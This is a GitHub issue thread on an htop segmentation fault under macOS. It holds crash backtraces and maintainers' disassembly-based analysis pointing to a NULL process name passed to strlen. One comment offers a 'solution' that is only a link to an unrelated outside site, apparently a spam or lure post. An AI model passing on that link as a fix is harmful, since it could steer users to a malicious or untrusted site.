### ISSUE TITLE
htop segmentation fault under macOS

### ISSUE THREAD

**Issue by gspbirel56** [htop-dev/htop#1650]
htop-version: 3.4.0-dev
OS and kernel version: Darwin Chriss-MacBook-Pro.local 24.3.0 Darwin Kernel Version 24.3.0: Thu Jan  2 20:24:16 PST 2025; root:xnu-11215.81.4~3/RELEASE_ARM64_T6000 arm64
Likely steps to reproduce: I left htop idle and used different apps
Backtrace:

Error information:
------------------
A signal 11 (Segmentation fault: 11) was received.

Setting information:
--------------------
htop_version=3.4.0-dev;config_reader_min_version=3;fields=0 48 17 18 38 39 2 46 47 49 1;hide_kernel_threads=1;hide_userland_threads=0;hide_running_in_container=0;shadow_other_users=0;show_thread_names=0;show_program_path=1;highlight_base_name=0;highlight_deleted_exe=1;shadow_distribution_path_prefix=0;highlight_megabytes=1;highlight_threads=1;highlight_changes=0;highlight_changes_delay_secs=5;find_comm_in_cmdline=1;strip_exe_from_cmdline=1;show_merged_command=0;header_margin=1;screen_tabs=1;detailed_cpu_time=0;cpu_count_from_one=0;show_cpu_usage=1;show_cpu_frequency=0;show_cached_memory=1;update_process_names=0;account_guest_in_cpu_meter=0;color_scheme=0;enable_mouse=1;delay=15;hide_function_bar=0;header_layout=two_50_50;column_meters_0=LeftCPUs2 Memory Swap;column_meter_modes_0=1 1 1;column_meters_1=RightCPUs2 Tasks LoadAverage Uptime;column_meter_modes_1=1 2 2 2;tree_view=0;sort_key=46;tree_sort_key=0;sort_direction=-1;tree_sort_direction=1;tree_view_always_by_pid=0;all_branches_collapsed=0;screen:Main=PID USER PRIORITY NICE M_VIRT M_RESIDENT STATE PERCENT_CPU PERCENT_MEM TIME Command;.sort_key=PERCENT_CPU;.tree_sort_key=PID;.tree_view_always_by_pid=0;.tree_view=0;.sort_direction=-1;.tree_sort_direction=1;.all_branches_collapsed=0;

Backtrace information:
----------------------
0   htop                                0x0000000102e83b60 CRT_handleSIGSEGV + 288
1   libsystem_platform.dylib            0x000000018bdfade4 _sigtramp + 56
2   htop                                0x0000000102e9920c DarwinProcess_scanThreads + 444
3   htop                                0x0000000102e99654 ProcessTable_goThroughEntries + 540
4   htop                                0x0000000102e87dd0 Machine_scanTables + 152
5   htop                                0x0000000102e9105c ScreenManager_run + 364
6   htop                                0x0000000102e81f40 CommandLine_run + 1872
7   dyld                                0x000000018ba44274 start + 2840

Disassembly is attached

[htop.otool.zip](https://github.com/user-attachments/files/19411468/htop.otool.zip)

**Comment by minegameYTB** [comment]
Same problem on macOS x86-64

htop 3.4.0

```
uname -a : Darwin Minegames-iPro 22.6.0 Darwin Kernel Version 22.6.0: Thu Dec  5 23:45:11 PST 2024; root:xnu-8796.141.3.709.7~4/RELEASE_X86_64 x86_64

Error information:
------------------
A signal 11 (Segmentation fault: 11) was received.

Setting information:
--------------------
htop_version=3.4.0-dev;config_reader_min_version=3;fields=0 48 17 18 38 39 2 46 47 49 1;hide_kernel_threads=1;hide_userland_threads=0;hide_running_in_container=0;shadow_other_users=0;show_thread_names=0;show_program_path=1;highlight_base_name=0;highlight_deleted_exe=1;shadow_distribution_path_prefix=0;highlight_megabytes=1;highlight_threads=1;highlight_changes=0;highlight_changes_delay_secs=5;find_comm_in_cmdline=1;strip_exe_from_cmdline=1;show_merged_command=0;header_margin=1;screen_tabs=1;detailed_cpu_time=0;cpu_count_from_one=0;show_cpu_usage=1;show_cpu_frequency=0;show_cached_memory=1;update_process_names=0;account_guest_in_cpu_meter=0;color_scheme=0;enable_mouse=1;delay=15;hide_function_bar=0;header_layout=two_50_50;column_meters_0=AllCPUs Memory Swap;column_meter_modes_0=1 1 1;column_meters_1=Tasks LoadAverage Uptime;column_meter_modes_1=2 2 2;tree_view=0;sort_key=46;tree_sort_key=0;sort_direction=-1;tree_sort_direction=1;tree_view_always_by_pid=0;all_branches_collapsed=0;screen:Main=PID USER PRIORITY NICE M_VIRT M_RESIDENT STATE PERCENT_CPU PERCENT_MEM TIME Command;.sort_key=PERCENT_CPU;.tree_sort_key=PID;.tree_view_always_by_pid=0;.tree_view=0;.sort_direction=-1;.tree_sort_direction=1;.all_branches_collapsed=0;

Backtrace information:
----------------------
0   htop                                0x00000001059c75f4 CRT_handleSIGSEGV + 299
1   libsystem_platform.dylib            0x00007ff801b485ed _sigtramp + 29
2   ???                                 0x0000000000000000 0x0 + 0
3   htop                                0x00000001059dc663 DarwinProcess_scanThreads + 543
4   htop                                0x00000001059dcaa6 ProcessTable_goThroughEntries + 606
5   htop                                0x00000001059cb51c Machine_scanTables + 136
6   htop                                0x00000001059d4762 ScreenManager_run + 412
7   htop                                0x00000001059c5a5c CommandLine_run + 2076
8   dyld                                0x00007ff8017c0418 start + 1896

```

[htop.otool.zip](https://github.com/user-attachments/files/19432525/htop.otool.zip)

**Comment by fasterit** [comment]
Cannot reproduce this locally, but from reading the dumps the `strlen` in 
https://github.com/htop-dev/htop/blob/fdfbb5914325705481da95f9d06463239070702d/darwin/DarwinProcess.c#L275
looks like a potential culprit. `k->kp_proc.p_comm` seems to get free'd in `Process_updateComm` and there's no defensive programming here.
/DLange

**Comment by BenBE** [comment]
I'll take a look later. and see if I can pin down more details.

**Comment by saucekantrol** [comment]
I may I found a solution to your issue. Check it out here [click](https://forreststonesolutions.com/robots/)

**Comment by BenBE** [comment]
Actually, I found a second possible cause while looking at the disassembly.

Let's consider these few lines:

```
…
000000010001d208	bl	0x10001eb3c ; symbol stub for: _strlen
000000010001d20c	mov	x3, x0
000000010001d210	mov	x0, x23
000000010001d214	mov	x1, x24
000000010001d218	mov	w2, #0x0
000000010001d21c	bl	_Process_updateCmdline
000000010001d220	ldrb	w8, [sp, #0x1b]
000000010001d224	adrp	x24, -1 ; 0x10001c000
000000010001d228	add	x24, x24, #0xaec
000000010001d22c	cbnz	w8, 0x10001d23c
000000010001d230	mov	x0, x20
000000010001d234	mov	x1, x23
000000010001d238	bl	_Table_add
…
```

The reason I'm highlighting this is: `000000010001d208` is `DarwinProcess_scanThreads + 444` (`-4` because of how return addresses are handled). So what's special about these lines? Well, We have a call to `strlen`, `Process_updateCmdline`, and `Table_add` right next to each other. Let's look at what code location inside `DarwinProcess_scanThreads` looks similar to this and find the following:

```c
…

      const char* name = extended_info.pth_name[0] != '\0' ? extended_info.pth_name : proc->procComm;
      Process_updateCmdline(tprocess, name, 0, strlen(name));

      if (!preExisting)
         ProcessTable_add(&dpt->super, tprocess);
   }
…
```

Looking around in the assembly we find even more hints confirming this mapping (Copilot will give the details if you ask it for the exact mapping).

Now we are presented with two cases:
1. `extended_info.pth_name` being `NULL`, which can be rules out by the condition `extended_info.pth_name[0] != '\0'` in front of it crashing (SIGSEGV)
2. `proc->procComm` being `NULL`, which leaves `extended_info.pth_name` as non-`NULL`, but pointing to a NUL byte (as otherwise we'd be back at the check crashing with a SIGSEGV).

We can conclude by simple logic, that the first option is not the branch being taken, as this would imply `extended_info.pth_name == NULL` for `strlen(name)` to segfault, which it can't be as this would already segfault the check for taking that branch. Thus we are left with the second option.

This implies, that `proc->procComm` was initialized to `NULL` by the caller of `DarwinProcess_scanThreads`, which is `ProcessTable_goThroughEntries` based on the stack trace.

Okay, let's look where `proc->procComm` is set. Doing so finds us `Process_updateComm`. Looking at the source of this we find, that, whatever this function is called with, will be set. Thus we need to find all call sites of this function in the Darwin implementation. Luckily, there's only one such occurrance, which is right at the top of `DarwinProcess_updateCmdLine`:

```c
static void DarwinProcess_updateCmdLine(const struct kinfo_proc* k, Process* proc) {
   Process_updateComm(proc, k->kp_proc.p_comm);
…
```

As there's no NULL checks or whatever around this call, if `k->kp_proc.p_comm` is `NULL`, so will be `proc->procComm`.
